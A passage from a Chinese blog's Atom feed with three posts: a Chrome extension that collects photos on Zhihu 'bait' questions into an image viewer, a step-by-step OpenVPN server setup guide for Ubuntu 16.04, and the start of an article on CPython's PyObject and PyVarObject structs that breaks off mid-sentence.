<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">██╗ ██╗ █████╗ ██████╗ ████████╗</span><br><span class="line">╚██╗██╔╝██╔══██╗██╔══██╗╚══██╔══╝</span><br><span class="line"> ╚███╔╝ ███████║██████╔╝ ██║</span><br><span class="line"> ██╔██╗ ██╔══██║██╔══██╗ ██║</span><br><span class="line">██╔╝ ██╗██║ ██║██║ ██║ ██║</span><br><span class="line">╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝</span><br></pre></td></tr></table></figure>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>知乎鱼钩:用技术方式炸鱼</title>
<link href="https://xlzd.me/2016/10/17/zhfishhook/"/>
<id>https://xlzd.me/2016/10/17/zhfishhook/</id>
<published>2016-10-17T11:49:47.000Z</published>
<updated>2019-05-14T06:33:49.585Z</updated>
<content type="html"><![CDATA[<h1 id="zhfishhook-知乎鱼钩"><a href="#zhfishhook-知乎鱼钩" class="headerlink" title="zhfishhook 知乎鱼钩"></a>zhfishhook 知乎鱼钩</h1><hr><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>知乎上存在大量钓鱼问题,比如:</p><ul><li>胸大真的自信吗? - 钓鱼(广义的)</li><li>为什么翘臀那么吸引人,女生如何练翘臀? - 钓鱼(广义的)</li><li>怎么搭配丝袜优雅不低俗? - 钓鱼(广义的)</li><li>……</li></ul><p>这些问题都有大量上钩的鱼爆照,同时也滋生了诸如「轮带逛」、「葡带逛」之类点赞带逛行为。然而,在浏览钓鱼问题的时候,存在一个极不好的体验:<strong>爆照与爆照之间或许间隔着许多文字回答,读图的连贯性被破坏了</strong>。</p><p>这个插件旨在解决这个问题,当打开一个有图片的知乎问题页面时,左上角会显示如下按钮:</p><p><img src="https://raw.githubusercontent.com/xlzd/zhfishhook/master/screenshots/p1.png" alt="p1.png"></p><p>当按下按钮之后,页面则会变成如下效果:</p><p><img src="https://raw.githubusercontent.com/xlzd/zhfishhook/master/screenshots/p2.png" alt="p2.png"></p><p>继续翻页:</p><p><img src="https://raw.githubusercontent.com/xlzd/zhfishhook/master/screenshots/p3.png" alt="p3.png"></p><hr><h2 id="快捷键"><a href="#快捷键" class="headerlink" title="快捷键"></a>快捷键</h2><p>如果通过键盘操作,则有以下快捷键:</p><table><thead><tr><th>按键</th><th>作用</th></tr></thead><tbody><tr><td><code>s</code></td><td>进入或退出图片浏览模式</td></tr><tr><td><code>esc</code></td><td>退出图片浏览模式</td></tr><tr><td><code>↑</code> <code>←</code></td><td>上一张图片</td></tr><tr><td><code>↓</code> <code>→</code></td><td>下一张图片</td></tr></tbody></table><hr><h2 id="插件下载"><a href="#插件下载" class="headerlink" title="插件下载"></a>插件下载</h2><p>下载链接:<a href="https://raw.githubusercontent.com/xlzd/zhfishhook/master/release/zhfishhook.crx" target="_blank">https://raw.githubusercontent.com/xlzd/zhfishhook/master/release/zhfishhook.crx</a></p><p>安装请参考之前的知乎专栏:<a href="https://zhuanlan.zhihu.com/p/22107246?refer=xlz-d" target="_blank">「云拉黑」是什么 - xlzd杂谈 - 知乎专栏</a></p><hr><h2 id="后续功能"><a href="#后续功能" class="headerlink" title="后续功能"></a>后续功能</h2><ul><li>加载更多</li><li>自动播放模式</li><li>推荐阅读(推荐热门钓鱼问题)</li><li>欢迎建议</li></ul>]]></content>
<summary type="html">
<h1 id="zhfishhook-知乎鱼钩"><a href="#zhfishhook-知乎鱼钩" class="headerlink" title="zhfishhook 知乎鱼钩"></a>zhfishhook 知乎鱼钩</h1><hr>
<h2 id="简介"><a h
</summary>
<category term="chrome-extension" scheme="https://xlzd.me/tags/chrome-extension/"/>
</entry>
<entry>
<title>怎样在 Ubuntu 16.04 上安装 OpenVPN 服务</title>
<link href="https://xlzd.me/2016/10/10/openvpn/"/>
<id>https://xlzd.me/2016/10/10/openvpn/</id>
<published>2016-10-10T01:20:04.000Z</published>
<updated>2019-05-14T06:33:49.579Z</updated>
<content type="html"><![CDATA[<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/06/27/329318860.jpg" alt="open_vpn_server_tw.jpg"></p><p><strong>参考自 <a href="https://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-16-04" target="_blank" rel="noopener">How To Set Up an OpenVPN Server on Ubuntu 16.04</a></strong></p><h2 id="为什么需要-OpenVPN"><a href="#为什么需要-OpenVPN" class="headerlink" title="为什么需要 OpenVPN"></a>为什么需要 OpenVPN</h2><p>对我来讲,有两个原因:</p><ul><li>安全地在不安全的网络环境下上网:如需要在酒店、咖啡厅或者不可信任的 Wi-Fi 环境下上网时,我需要确保自己不会被监听。</li><li>跨过防火墙,享受自由的网络环境。</li></ul><p>那么,为什么我不用 ShadowSocks 呢?答案是,其实我也在用,不过它在 iOS 上的表现确实无法令人满意,另外,PC 端使用 Chrome 配合 ss 翻墙的时候需要很复杂的配置(或许我不会用吧),相比之下, OpenVPN 可以非常方便的全部搞定(除了安装比较复杂)。所以,这篇博客记录下 OpenVPN 服务的安装过程,以供参考。</p><p>文中使用的服务器是 Ubuntu 16.04,不过 Debian 系的操作系统应该是可以通用的。</p><a id="more"></a><hr><h2 id="安装-OpenVPN,设置-CA-目录"><a href="#安装-OpenVPN,设置-CA-目录" class="headerlink" title="安装 OpenVPN,设置 CA 目录"></a>安装 OpenVPN,设置 CA 目录</h2><p>首先,在服务器端安装 OpenVPN 服务。我们可以很方便地通过 <code>apt-get</code> 安装,另外我们也需要安装<code>easy-rsa</code>:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ sudo apt-get update</span><br><span class="line">$ sudo apt-get install openvpn easy-rsa</span><br></pre></td></tr></table></figure></p><p>然后,复制 <code>easy-rsa</code> 模板到 <code>home</code> 目录:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ make-cadir ~/openvpn-ca</span><br><span class="line">$ cd ~/openvpn-ca</span><br></pre></td></tr></table></figure><hr><h2 id="配置-CA-变量"><a href="#配置-CA-变量" class="headerlink" title="配置 CA 变量"></a>配置 CA 变量</h2><p>进入 <code>openvpn-ca</code> 目录之后,用 vim (或者任意编辑器) 打开 <code>vars</code> 文件,到最后一部分,你将会看到如下内容:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">. . .</span><br><span class="line"></span><br><span class="line">export KEY_COUNTRY="US"</span><br><span class="line">export KEY_PROVINCE="CA"</span><br><span class="line">export KEY_CITY="SanFrancisco"</span><br><span class="line">export KEY_ORG="Fort-Funston"</span><br><span class="line">export KEY_EMAIL="me@myhost.mydomain"</span><br><span class="line">export KEY_OU="MyOrganizationalUnit"</span><br><span class="line"></span><br><span class="line">. . .</span><br></pre></td></tr></table></figure><p>修改为任意你想要修改的值,只要不留空就好了:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">. . .</span><br><span class="line"></span><br><span class="line">export KEY_COUNTRY="CN"</span><br><span class="line">export KEY_PROVINCE="BJ"</span><br><span class="line">export KEY_CITY="Beijing"</span><br><span class="line">export KEY_ORG="xlzd"</span><br><span class="line">export KEY_EMAIL="what@the.fuck"</span><br><span class="line">export KEY_OU="Community"</span><br><span class="line"></span><br><span class="line">. . .</span><br></pre></td></tr></table></figure><p>然后,还需要将 <code>KEY_NAME</code> 改为你喜欢的,这里简单起见,我们改成 <code>server</code>:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">export KEY_NAME="server"</span><br></pre></td></tr></table></figure><p>然后,保存并关闭文件。</p><hr><h2 id="构建-Certificate-Authority"><a href="#构建-Certificate-Authority" class="headerlink" title="构建 Certificate Authority"></a>构建 Certificate Authority</h2><p>在刚才的目录中,执行 <code>source vars</code> ,然后,你将会看到如下输出:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/xlzd/openvpn-ca/keys</span><br></pre></td></tr></table></figure><p>然后执行:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ ./clean-all</span><br><span class="line">$ ./build-ca</span><br></pre></td></tr></table></figure><p>这将会启动创建根证书颁发密钥、证书的过程。由于我们刚才修改了 <code>vars</code> 文件,所有值应该都会自动填充。所以,一路回车就好了:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">Output</span><br><span class="line">Generating a 2048 bit RSA private key</span><br><span class="line">..........................................................................................+++</span><br><span class="line">...............................+++</span><br><span class="line">writing new private key to 'ca.key'</span><br><span class="line">-----</span><br><span class="line">You are about to be asked to enter information that will be incorporated</span><br><span class="line">into your certificate request.</span><br><span class="line">What you are about to enter is what is called a Distinguished Name or a DN.</span><br><span class="line">There are quite a few fields but you can leave some blank</span><br><span class="line">For some fields there will be a default value,</span><br><span class="line">If you enter '.', the field will be left blank.</span><br><span class="line">-----</span><br><span class="line">Country Name (2 letter code) [CN]:</span><br><span class="line">State or Province Name (full name) [BJ]:</span><br><span class="line">Locality Name (eg, city) [Beijing]:</span><br><span class="line">Organization Name (eg, company) [xlzd]:</span><br><span class="line">Organizational Unit Name (eg, section) [Community]:</span><br><span class="line">Common Name (eg, your name or your server's hostname) [the.fuck]:</span><br><span class="line">Name [server]:</span><br><span class="line">Email Address [waht@the.fuck]:</span><br></pre></td></tr></table></figure><p>到此,我们就有了创建以下步骤需要的 CA 证书。</p><hr><h2 id="创建服务器端证书、密钥和加密文件"><a href="#创建服务器端证书、密钥和加密文件" class="headerlink" title="创建服务器端证书、密钥和加密文件"></a>创建服务器端证书、密钥和加密文件</h2><p>执行 <code>./build-key-server server</code> 命令,然后继续一路回车就好了。到最后,你需要输入两次 <code>y</code> 注册证书和提交:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">. . .</span><br><span class="line"></span><br><span class="line">Certificate is to be certified until May 1 17:51:16 2026 GMT (3650 days)</span><br><span class="line">Sign the certificate? [y/n]:y</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">1 out of 1 certificate requests certified, commit? [y/n]y</span><br><span class="line">Write out database with 1 new entries</span><br><span class="line">Data Base Updated</span><br></pre></td></tr></table></figure><p>然后还需要生成一些其他东西,在终端执行 <code>./build-dh</code>,这个操作大约会花费几分钟不等。然后,我们可以生成 HMAC 签名加强服务器的 TLS 完整性验证功能:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openvpn --genkey --secret keys/ta.key</span><br></pre></td></tr></table></figure><hr><h2 id="生成客户端证书、密钥对"><a href="#生成客户端证书、密钥对" class="headerlink" title="生成客户端证书、密钥对"></a>生成客户端证书、密钥对</h2><p>这一步之后可能会执行多次以生成不同的证书,这里我们以 <code>xclient</code> 作为第一组密钥对的名字:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cd ~/openvpn-ca</span><br><span class="line">source vars</span><br><span class="line">./build-key xclient</span><br></pre></td></tr></table></figure><p>跟刚才一样,一路回车就好。</p><hr><h2 id="配置-OpenVPN-服务"><a href="#配置-OpenVPN-服务" class="headerlink" title="配置 OpenVPN 服务"></a>配置 OpenVPN 服务</h2><p>首先,复制文件到 OpenVPN 的目录下:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ cd ~/openvpn-ca/keys</span><br><span class="line">$ sudo cp ca.crt ca.key server.crt server.key ta.key dh2048.pem /etc/openvpn</span><br></pre></td></tr></table></figure><p>然后,复制并解压一个 OpenVPN 的配置示例:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ gunzip -c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz | sudo tee /etc/openvpn/server.conf</span><br></pre></td></tr></table></figure><p>接着是调整配置,打开 <code>/etc/openvpn/server.conf</code> 文件,找到 <code>redirect-gateway</code> 的位置,去掉注释,修改为如下:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">push "redirect-gateway def1 bypass-dhcp"</span><br></pre></td></tr></table></figure><p>然后找到 <code>dhcp-option</code> 位置,修改为下面这样:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">push "dhcp-option DNS 208.67.222.222"</span><br><span class="line">push "dhcp-option DNS 208.67.220.220"</span><br></pre></td></tr></table></figure><p>再找到 <code>tls-auth</code> 位置,去掉注释,并在下面新增一行:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tls-auth ta.key 0 # This file is secret</span><br><span class="line">key-direction 0</span><br></pre></td></tr></table></figure><p>最后,去掉 <code>user</code> 和 <code>grup</code> 行前的注释:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">user nobody</span><br><span class="line">group nogroup</span><br></pre></td></tr></table></figure><hr><h2 id="调整服务器网络配置"><a href="#调整服务器网络配置" class="headerlink" title="调整服务器网络配置"></a>调整服务器网络配置</h2><h3 id="允许-IP-转发"><a href="#允许-IP-转发" class="headerlink" title="允许 IP 转发"></a>允许 IP 转发</h3><p>编辑 <code>/etc/sysctl.conf</code> 文件,去掉 <code>net.ipv4.ip_forward</code> 设置前的注释:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net.ipv4.ip_forward=1</span><br></pre></td></tr></table></figure><p>输入 <code>sudo sysctl -p</code> 以读取文件并对当前会话生效。</p><h3 id="调整-UFW-规则"><a href="#调整-UFW-规则" class="headerlink" title="调整 UFW 规则"></a>调整 UFW 规则</h3><p>编辑 <code>/etc/ufw/before.rules</code> 文件,在文件顶部,新增如下 11-18 行的内容:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">01 #</span><br><span class="line">02 # rules.before</span><br><span class="line">03 #</span><br><span class="line">04 # Rules that should be run before the ufw command line added rules. Custom</span><br><span class="line">05 # rules should be added to one of these chains:</span><br><span class="line">06 # ufw-before-input</span><br><span class="line">07 # ufw-before-output</span><br><span class="line">08 # ufw-before-forward</span><br><span class="line">09 #</span><br><span class="line">10 </span><br><span class="line">11 # START OPENVPN RULES</span><br><span class="line">12 # NAT table rules</span><br><span class="line">13 *nat</span><br><span class="line">14 :POSTROUTING ACCEPT [0:0] </span><br><span class="line">15 # Allow traffic from OpenVPN client to eth0</span><br><span class="line">16 -A POSTROUTING -s 10.8.0.0/8 -o eth0 -j MASQUERADE</span><br><span class="line">17 COMMIT</span><br><span class="line">18 # END OPENVPN RULES</span><br><span class="line">19</span><br><span class="line">20 # Don't delete these required lines, otherwise there will be errors</span><br><span class="line">*filter</span><br><span class="line">. . .</span><br></pre></td></tr></table></figure><p>其中,第 16 行还需要做一点调整。在终端执行 <code>ip route | grep default</code> 命令,你会看到类似如下的输出:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">default via 100.110.78.1 dev ens3</span><br></pre></td></tr></table></figure><p><code>dev</code> 之后的内容便是我们需要的,如我执行后输出如上,则我需要的是 <code>ens3</code>,每个人的结果可能不同,用它替换掉刚才文件第 16 行的 <code>eth0</code>,然后保存文件,退出。</p><p>接着需要修改 <code>/etc/default/ufw</code> 文件,找到 <code>DEFAULT_FORWARD_POLICY</code> 设置,修改为:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DEFAULT_FORWARD_POLICY="ACCEPT"</span><br></pre></td></tr></table></figure></p><h3 id="打开-OpenVPN-端口并使变化生效"><a href="#打开-OpenVPN-端口并使变化生效" class="headerlink" title="打开 OpenVPN 端口并使变化生效"></a>打开 OpenVPN 端口并使变化生效</h3><p>执行下面的命令:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ sudo ufw allow 1194/udp</span><br><span class="line"></span><br><span class="line">$ sudo ufw disable</span><br><span class="line">$ sudo ufw enable</span><br></pre></td></tr></table></figure><hr><h2 id="启动-OpenVPN"><a href="#启动-OpenVPN" class="headerlink" title="启动 OpenVPN"></a>启动 OpenVPN</h2><p>执行:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sudo systemctl start openvpn@server</span><br></pre></td></tr></table></figure><p>然后设置自启动:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sudo systemctl enable openvpn@server</span><br></pre></td></tr></table></figure></p><hr><h2 id="创建客户端配置"><a href="#创建客户端配置" class="headerlink" title="创建客户端配置"></a>创建客户端配置</h2><p>执行:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ mkdir -p ~/client-configs/files</span><br><span class="line"></span><br><span class="line">$ chmod 700 ~/client-configs/files</span><br><span class="line"></span><br><span class="line">$ cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/client-configs/base.conf</span><br></pre></td></tr></table></figure></p><p>然后打开 <code>~/client-configs/base.conf</code> 文件,修改 <code>remote server_IP_address 1194</code> 一行为你的服务器公网 IP,然后去掉 <code>user</code> 和 <code>group</code> 前的注释:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># Downgrade privileges after initialization (non-Windows only)</span><br><span class="line">user nobody</span><br><span class="line">group nogroup</span><br></pre></td></tr></table></figure><p>找到 <code>ca</code>/<code>cert</code>/<code>key</code>,注释掉:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># SSL/TLS parms.</span><br><span class="line"># See the server config file for more</span><br><span class="line"># description. It's best to use</span><br><span class="line"># a separate .crt/.key file pair</span><br><span class="line"># for each client. A single ca</span><br><span class="line"># file can be used for all clients.</span><br><span class="line">#ca ca.crt</span><br><span class="line">#cert client.crt</span><br><span class="line">#key client.key</span><br></pre></td></tr></table></figure><p>最后在文件末新增一行:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">key-direction 1</span><br></pre></td></tr></table></figure><p>保存,退出文件。</p><h3 id="创建配置生成脚本"><a href="#创建配置生成脚本" class="headerlink" title="创建配置生成脚本"></a>创建配置生成脚本</h3><p>新建 <code>~/client-configs/make_config.sh</code> 文件,复制如下内容:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/bash</span><br><span class="line"></span><br><span class="line"># First argument: Client identifier</span><br><span class="line"></span><br><span class="line">KEY_DIR=~/openvpn-ca/keys</span><br><span class="line">OUTPUT_DIR=~/client-configs/files</span><br><span class="line">BASE_CONFIG=~/client-configs/base.conf</span><br><span class="line"></span><br><span class="line">cat ${BASE_CONFIG} \</span><br><span class="line"> <(echo -e '<ca>') \</span><br><span class="line"> ${KEY_DIR}/ca.crt \</span><br><span class="line"> <(echo -e '</ca>\n<cert>') \</span><br><span class="line"> ${KEY_DIR}/${1}.crt \</span><br><span class="line"> <(echo -e '</cert>\n<key>') \</span><br><span class="line"> ${KEY_DIR}/${1}.key \</span><br><span class="line"> <(echo -e '</key>\n<tls-auth>') \</span><br><span class="line"> ${KEY_DIR}/ta.key \</span><br><span class="line"> <(echo -e '</tls-auth>') \</span><br><span class="line"> > ${OUTPUT_DIR}/${1}.ovpn</span><br></pre></td></tr></table></figure><p>保存并赋予执行权限:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ chmod 700 ~/client-configs/make_config.sh</span><br></pre></td></tr></table></figure><hr><h2 id="生成客户端配置"><a href="#生成客户端配置" class="headerlink" title="生成客户端配置"></a>生成客户端配置</h2><p>执行:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ cd ~/client-configs</span><br><span class="line">$ ./make_config.sh xclient</span><br></pre></td></tr></table></figure><p>然后,在 <code>~/client-configs/files</code> 目录下,便有了 <code>xclient.ovpn</code> 文件。将文件下载到本地即可使用了。</p><hr><h2 id="客户端下载"><a href="#客户端下载" class="headerlink" title="客户端下载"></a>客户端下载</h2><p>Windows: <a href="https://openvpn.net/index.php/open-source/downloads.html" target="_blank" rel="noopener">OpenVPN</a><br>OS X: <a href="https://tunnelblick.net/downloads.html" target="_blank" rel="noopener">Tunnelblick</a><br>iOS: <a href="https://itunes.apple.com/us/app/id590379981" target="_blank" rel="noopener">OpenVPN Connect</a><br>Android: <a href="https://play.google.com/store/apps/details?id=net.openvpn.openvpn" target="_blank" rel="noopener">OpenVPN Connect</a></p><p>下载安装客户端之后,导入刚才的配置文件,就可以愉快又安全地体验没有墙的互联网啦~~~</p>]]></content>
<summary type="html">
<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/06/27/329318860.jpg" alt="open_vpn_server_tw.jpg"></p>
<p><strong>参考自 <a href="https://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-16-04" target="_blank" rel="noopener">How To Set Up an OpenVPN Server on Ubuntu 16.04</a></strong></p>
<h2 id="为什么需要-OpenVPN"><a href="#为什么需要-OpenVPN" class="headerlink" title="为什么需要 OpenVPN"></a>为什么需要 OpenVPN</h2><p>对我来讲,有两个原因:</p>
<ul>
<li>安全地在不安全的网络环境下上网:如需要在酒店、咖啡厅或者不可信任的 Wi-Fi 环境下上网时,我需要确保自己不会被监听。</li>
<li>跨过防火墙,享受自由的网络环境。</li>
</ul>
<p>那么,为什么我不用 ShadowSocks 呢?答案是,其实我也在用,不过它在 iOS 上的表现确实无法令人满意,另外,PC 端使用 Chrome 配合 ss 翻墙的时候需要很复杂的配置(或许我不会用吧),相比之下, OpenVPN 可以非常方便的全部搞定(除了安装比较复杂)。所以,这篇博客记录下 OpenVPN 服务的安装过程,以供参考。</p>
<p>文中使用的服务器是 Ubuntu 16.04,不过 Debian 系的操作系统应该是可以通用的。</p>
</summary>
<category term="Linux" scheme="https://xlzd.me/tags/Linux/"/>
<category term="GFW" scheme="https://xlzd.me/tags/GFW/"/>
</entry>
<entry>
<title>Python 中的对象概述</title>
<link href="https://xlzd.me/2016/08/29/object-in-py/"/>
<id>https://xlzd.me/2016/08/29/object-in-py/</id>
<published>2016-08-29T13:58:19.000Z</published>
<updated>2019-05-14T06:33:49.578Z</updated>
<content type="html"><![CDATA[<p>在 Python 的世界中,一切皆对象。 int / list / dict / … 都是对象,除此之外,函数、类本身也是对象,那么,这些对象究竟是什么呢?</p><p>从结果看,Python 中的对象是 C 语言中结构体在堆上申请的一片内存区域。而在具体实现上,这里先简单描述一下。<br><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/07/09/987200237.png" alt="obj"></p><a id="more"></a><hr><h2 id="万物基于-MIUI:-PyObject"><a href="#万物基于-MIUI:-PyObject" class="headerlink" title="万物基于 MIUI: PyObject"></a>万物基于 MIUI: PyObject</h2><p>在 Python 中,所有对象都共有一些特性,这些特性定义在 <code>PyObject</code> 中。<code>PyObject</code> 定义在 <code>Include/object.h</code> 中:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> PyObject_HEAD \</span></span><br><span class="line"> _PyObject_HEAD_EXTRA \</span><br><span class="line"> Py_ssize_t ob_refcnt; \</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> _<span class="title">typeobject</span> *<span class="title">ob_type</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">object</span> {</span></span><br><span class="line"> PyObject_HEAD</span><br><span class="line">} PyObject;</span><br></pre></td></tr></table></figure><p>简化后即为:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">object</span> {</span></span><br><span class="line"> <span class="keyword">int</span> ob_refcnt; </span><br><span class="line"> <span class="class"><span class="keyword">struct</span> _<span class="title">typeobject</span> *<span class="title">ob_type</span>;</span></span><br><span class="line">} PyObject;</span><br></pre></td></tr></table></figure></p><p>在 PyObject 中,<code>ob_refcnt</code> 用以记录对象的引用数(与引用计数的内存回收相关,这里暂且不表),当有新的指针指向某对象时,<code>ob_refcnt</code> 的值加 1, 当指向某对象的指针删除时,<code>ob_refcnt</code> 的值减 1,当其值为零的时候,则可以将该对象从堆中删除(事实上并不会立即删除,这里暂且不表)。除了 <code>ob_refcnt</code> 之外,还有一个 指向 <code>_typeobject</code> 指针 <code>ob_type</code>。这个结构体用于表示对象类型。跳过 <code>_typeobject</code>,可以发现, Python 对象的核心在于一个引用计数和一个类型信息。</p><p><code>PyObject</code> 定义的内容会出现在每个对象所占内存的开始部分。</p><hr><h2 id="定长对象与变长对象"><a href="#定长对象与变长对象" class="headerlink" title="定长对象与变长对象"></a>定长对象与变长对象</h2><p>在 Python 中,除了 <code>bool</code> <code>float</code> 这样的定长对象(一旦确定下来需要的内存,便不再有改动),还有另外一种对象:长度可变的对象。这种对象在 Python 的实现中通过 <code>PyVarObject</code> 结构体来表示:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">#define PyObject_VAR_HEAD \</span><br><span class="line"> PyObject_HEAD \</span><br><span class="line"> Py_ssize_t ob_size; /* Number of items in variable part */</span><br><span class="line"></span><br><span class="line">typedef struct {</span><br><span class="line"> PyObject_VAR_HEAD</span><br><span class="line">} PyVarObject;</span><br></pre></td></tr></table></figure><p>事实上,就是在 <code>PyObject</code> 的基础上,多了一个 <code>ob_size</code> 变量,用以标识对象的长度(<strong>是长度,不是内存占用</strong>)。也就是说,其实 